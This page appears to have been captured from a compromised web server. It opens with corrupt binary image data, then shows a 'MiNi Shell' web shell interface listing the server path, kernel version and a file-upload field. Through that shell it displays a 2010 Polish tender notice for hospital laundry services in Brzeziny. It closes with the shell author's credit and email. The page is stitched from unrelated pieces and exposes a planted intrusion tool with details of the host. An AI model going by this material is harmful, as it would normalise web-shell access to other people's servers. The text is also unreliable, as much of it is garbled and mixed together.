JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100202/29032-N-2010.html

<p class="kh_header"><b>Brzeziny: ŚWIADCZENIE USŁUG PRALNICZYCH  WRAZ  Z TRANSPORTEM  BIELIZNY, ORAZ CZYSZCZENIE CHEMICZNE ASORTYMENTU NIE NADAJĄCEGO SIĘ DO PRANIA WODNEGO  - DLA SAMODZIELNEGO PUBLICZNEGO ZAKŁADU OPIEKI  ZDROWOTNEJ  W BRZEZINACH</b><br>
<b>Numer ogłoszenia: 29032 - 2010; data zamieszczenia: 02.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Brzezinach , ul. M.C. Skłodowskiej 6, 95-060 Brzeziny, woj. łódzkie, tel. 046 8742002, faks 046 8742606.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zozb.republika.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ŚWIADCZENIE USŁUG PRALNICZYCH  WRAZ  Z TRANSPORTEM  BIELIZNY, ORAZ CZYSZCZENIE CHEMICZNE ASORTYMENTU NIE NADAJĄCEGO SIĘ DO PRANIA WODNEGO  - DLA SAMODZIELNEGO PUBLICZNEGO ZAKŁADU OPIEKI  ZDROWOTNEJ  W BRZEZINACH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ŚWIADCZENIE USŁUG PRALNICZYCH  WRAZ  Z TRANSPORTEM  BIELIZNY, ORAZ CZYSZCZENIE CHEMICZNE ASORTYMENTU NIE NADAJĄCEGO SIĘ DO PRANIA WODNEGO  - DLA SAMODZIELNEGO PUBLICZNEGO ZAKŁADU OPIEKI  ZDROWOTNEJ  W BRZEZINACH   
1.1. SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA;
W zakres świadczonych usług pralniczych wchodzi: pranie wodne bielizny szpitalnej, operacyjnej, materacy, koców, poduszek, oraz odzieży ochronnej i operacyjnej i innych (firany, zasłony, obrusy)dezynfekcja chemiczno-termiczna; prasowanie; maglowanie, suszenie w suszarkach bębnowychi naprawy krawieckie oraz czyszczenie chemiczne asortymentu nie nadającego się do prania wodnego
 wraz z transportem -   (asortyment przeznaczony do prania  - zwany dalej bielizną),
Szacunkowa ilość bielizny przeznaczonej do prania w okresie  36 miesięcy wynosi:104.000 kg,  
      w tym: 
	- bielizna pościelowa - 95.500 kg,
	- ubrania: lekarskie, odzież szpitalna, szlafroki itp. - 3 000 kg,
	- poduszki, koce, kołdry - 3 500 kg
	- firany, zasłony, ręczniki, obrusy, ścierki itp. -  1 500 kg.
	- materace - 500 kg.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 98.31.00.00-9, 98.31.10.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunki określone w art. 22 ust. 1, jeżeli Wykonawca:
2.1. prowadzi działalność gospodarczą w zakresie objętym przedmiotowym zamówieniem;
2.2. nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne
 i społeczne, lub uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu. 
2.3.Posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub posiada oświadczenia innego podmiotu o udostępnieniu potencjału technicznego i osób zdolnych do realizacji zamówienia, tj.: należyte wykonanie lub wykonywanie, przez okres co najmniej 12 miesięcy, w okresie ostatnich 3 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej trzech usług, odpowiadających swoim rodzajem usługom stanowiącym przedmiot zamówienia (świadczenie usług pralniczych  oraz czyszczeniem chemicznym i transportem dla jednostki służby zdrowia), o wartości nie mniejszej niż 500 000 złotych brutto każda), Zamawiający uzna, że Wykonawca spełnia ww. warunek, jeżeli w przedstawionych dokumentach wykaże, że w okresie ostatnich trzech lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonał lub wykonywał przez minimum 12 miesięcy, przynajmniej trzy zamówienia, polegające na świadczeniu usług pralniczych  oraz czyszczeniem chemicznym i transportem dla jednostki służby zdrowia o wartości każdego nie mniejszej niż niniejszy przedmiot zamówienia , oraz potwierdzi, że usługi te zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>.Posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, lub zostanie przedstawione pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia w tym:
a)	dysponuje pralnią spełniającą wymogi Rozporządzenia Ministra Zdrowia i Opieki Społecznej z dnia 10 listopada 2006 r. ( Dz. U. Nr 213, poz. 1568), oraz Rozporządzeniem Ministra Gospodarki z dnia 27.04.2000r. ( Dz. U. nr 40 z dnia 19.05.2000. poz. 469) 
w zakresie bezpieczeństwa i higieny pracy w pralniach, która musi posiadać pełną barierę higieniczną, oraz automatyczny system dozowania środków piorąco-dezynfekujących.
Pralnia musi być wyposażona w pralnicę tunelową, celem zmniejszenia ryzyka zniszczenia bielizny w trakcie prania (tarcie) oraz wyładunku. Wykonawca musi udokumentować, 
że dysponuje pralnią w całym czasie realizacji umowy, tj, będzie w stanie zrealizować zamówienie zgodnie z SIWZ oraz ww. przepisami. W przypadku pralni dzierżawionej, wynajmowanej, będącej w użyczeniu itp., Wykonawca obowiązany jest podać w ofercie miejsce realizacji usługi oraz podstawę prawną do dysponowania pralnią wraz z czasookresem zawarcia umowy oraz podaniem strony, z którą Wykonawca zawarł umowę. Należy przedstawić opis maszyn i urządzeń, w niej się znajdujących, które będą potwierdzać wymogi niniejszego rozdziału oraz możliwości zrealizowania przedmiotu zamówienia zgodnie z SIWZ i zał. do SIWZ. Dotyczy to również pralni będących własnością Wykonawcy ubiegającego się o zamówienia publiczne, z wyjątkiem części dotyczącej najmu, dzierżawy, umowy użyczenia). Wykonawca winien udowodnić skuteczność i zgodność technologii prania oraz dezynfekcji stosowanej w pralni, w której Wykonawca będzie realizować zamówienie z ww. przepisami oraz niniejszą SIWZ. W tym celu należy przedstawić opis technologii prania 
i dezynfekcji bielizny szpitalnej oraz czyszczenia chemicznego asortymentu nie nadającego się do prania wodnego, w tym moduł prania i dezynfekcji bielizny. Celem potwierdzenia skuteczności dezynfekcji w procesie prania do oferty winno się dołączyć potwierdzające skuteczność dezynfekcji badania mikrobiologiczne z bielizny ogólnoszpitalnej, operacyjnej, noworodkowej, badania powierzchni pralni (posadzki), wykonane w pralni Wykonawcy 
i potwierdzone przez Stację Sanitarno Epidemiologiczną lub akredytowane laboratorium przez Polskie Centrum Akredytacji wystawione w terminie nie późniejszym niż 3 miesiące przed terminem składania ofert. 
Oferenci mający siedzibę poza terenem polski muszą dołączyć badania innego uprawnionego podmiotu, stosownie dla kraju, w którym ma siedzibę Wykonawca.  
b)	asortyment nie nadający się do prania wodnego winien być czyszczony chemiczne, 
po oddzielnym zapakowaniu przez Zamawiającego i przekazaniu na osobnym kwicie Wykonawcy. Należy udokumentować dysponowanie urządzeniem do czyszczenia chemicznego. Aby potwierdzić skuteczność dezynfekcji bielizny nie nadającej się do prania wodnego (czyszczenie chemiczne) Wykonawca winien dołączyć wymazy czystościowe z w/w asortymentu, potwierdzone przez Stację Sanitarno - Epidemiologiczną lub akredytowane laboratorium przez Polskie Centrum Akredytacji. Oferenci mający siedzibę poza terenem polski muszą dołączyć badania innego uprawnionego podmiotu, stosownie dla kraju, w którym ma siedzibę Wykonawca. Należy przedstawić także co najmniej 2 badania mikrobiologiczne potwierdzające skuteczność czyszczenia chemicznego, wykonane w roku 2009 r.(jedno badanie) oraz jedno badanie wykonane w 2010 r.. 
c)	Wykonawca winien posiadać urządzenie do obróbki fartuchów i ubrań operacyjnych w pozycji wiszącej - za pomocą gorącego powietrza, umożliwiające ich odpylenie i zapewniające automatyczne składanie. 
d)	środki transportu przeznaczone do realizacji zamówienia muszą być dostosowane do przewozu bielizny szpitalnej, odpowiednio pozytywnie opiniowane przez Państwową Stację Sanitarno -Epidemiologiczną (wymaga się dysponowania min. 2 samochodami), z czego co najmniej jeden posiadać będzie podział na strefę czystą i brudną, tak aby asortyment czysty nie miał możliwości stykania się z asortymentem tzw. skażonym.
e)	wyładunek bielizny z samochodu do pralni oraz załadunek z pralni do samochodu winien odbywać się na wózkach jezdnych (wymaga się dysponowania min. 4 wózkami), Na pralni winno znajdować się automatyczne urządzenie do dezynfekcji pojemników i wózków. Celem potwierdzenia skuteczności procesu dezynfekcji wózków Wykonawca winien dołączyć badania mikrobiologiczne, potwierdzone przez Stację Sanitarno - Epidemiologiczną lub akredytowane laboratorium przez Polskie Centrum Akredytacji. Oferenci mający siedzibę poza terenem polski muszą dołączyć badania innego uprawnionego podmiotu, stosownie dla kraju, w którym ma siedzibę Wykonawca. Badania winny potwierdzać skuteczność funkcjonowania automatycznego urządzenia do dezynfekcji pojemników i wózków do transportu bielizny i być wystawione 1 z 1 półrocza 2009 i 1 z 2 półrocza 2009 r.
f)	usługi muszą być wykonywane zgodnie z wymogami obowiązującymi w służbie zdrowia 
ze szczególnym uwzględnieniem zaleceń dotyczących szpitali oraz wymogami niniejszej SIWZ;
g)	wymagane jest stosowanie oddzielnych cykli prania bielizny pochodzących z oddziałów szpitalnych i sal operacyjnych,
h)	stosowane środki do dezynfekcji w procesie prania wodnego winny posiadając   wpis do Rejestru Wyrobów Medycznych na urzędowym formularzu określonym w Rozporządzeniu Ministra Zdrowia na produkt przeznaczony do dezynfekcji bielizny, dopuszczony do obrotu zgodnie z Ustawą z dnia 13 września 2002r. o produktach biobójczych ( Dz. U. Nr 175 poz. 1433 z późn. zm.), świadectwo jakości zdrowotnej - dokumenty potwierdzające w/w wymóg należy dołączyć do oferty. 
i)	Celem potwierdzenia skuteczności czystości mikrobiologicznej automatycznego urządzenia do prasowania i odpylania ubrań operacyjnych, automatycznej składarki do fartuchów operacyjnych. Wykonawca winien dołączyć badania mikrobiologiczne, potwierdzone przez Stację Sanitarno - Epidemiologiczną lub akredytowane laboratorium przez Polskie Centrum Akredytacji. Oferenci mający siedzibę poza terenem polski muszą dołączyć badania innego uprawnionego podmiotu, stosownie dla kraju, w którym ma siedzibę Wykonawca, nie starsze niż 3 miesiące przed terminem składania ofert.
j)	Czyszczenie chemiczne winno się odbywać z zastosowaniem środków 
o właściwościach antystatycznych oraz dezynfekujących - dokumenty potwierdzające w/w wymóg należy dołączyć do oferty.
k)	Celem przeciwdziałania stanom zagrożenia epidemicznego wymaga się, aby bielizna czysta 
przywożona z pralni była poskładana i zapakowana asortymentowo w folie jednorazowego użytku, a odzież ochronna na wieszakach także w workach foliowych, które zabezpieczy Wykonawca.
l)	Posiadanie niezbędnej wiedzy i doświadczenia oraz dysponowanie potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub posiadanie oświadczenia innego podmiotu o udostępnieniu potencjału technicznego i osób zdolnych do realizacji zamówienia, tj.: należyte wykonanie lub wykonywanie, przez okres co najmniej 12 miesięcy, w okresie ostatnich 3 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej trzech usług, odpowiadających swoim rodzajem usługom stanowiącym przedmiot zamówienia (świadczenie usług pralniczych  oraz czyszczeniem chemicznym i transportem dla jednostki służby zdrowia), o wartości nie mniejszej niż 500 000 złotych brutto każda), Zamawiający uzna, że Wykonawca spełnia ww. warunek, jeżeli w przedstawionych dokumentach wykaże, że w okresie ostatnich trzech lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonał lub wykonywał przez minimum 12 miesięcy, przynajmniej trzy zamówienia, polegające na świadczeniu usług pralniczych  oraz czyszczeniem chemicznym i transportem dla jednostki służby zdrowia o wartości każdego nie mniejszej niż niniejszy przedmiot zamówienia , oraz potwierdzi, że usługi te zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
a)Posiada zdolność kredytową lub środki finansowe w wysokości, co najmniej 200 000,00 zł,
b)Posiadanie ubezpieczenia OC w zakresie prowadzonej działalności gospodarczej o wartości min. 500.000 zł, obejmującą usługi pralnicze w szczególności z klauzulą przenoszenia chorób zakaźnych oraz czyszczenie chemiczne.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z europejskimi normami zarządzania środowiskiem, jeżeli zamawiający wskazują środki zarządzania środowiskiem, które wykonawca będzie stosował podczas realizacji zamówienia na roboty budowlane lub usługi, odwołując się do systemu zarządzania środowiskiem i audytu (EMAS) lub norm zarządzania środowiskiem opartych na europejskich lub międzynarodowych normach poświadczonych przez podmioty działające zgodnie z prawem Unii Europejskiej, europejskimi lub międzynarodowymi normami dotyczącymi certyfikacji</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zozb.republika.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Brzezinach
 ul. M.C.Skłodowskiej 6
95-060 Brzeziny.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.02.2010 godzina 10:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej w Brzezinach
 ul. M.C.Skłodowskiej 6
95-060 Brzeziny- Sekcja Zamówień Publicznych.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com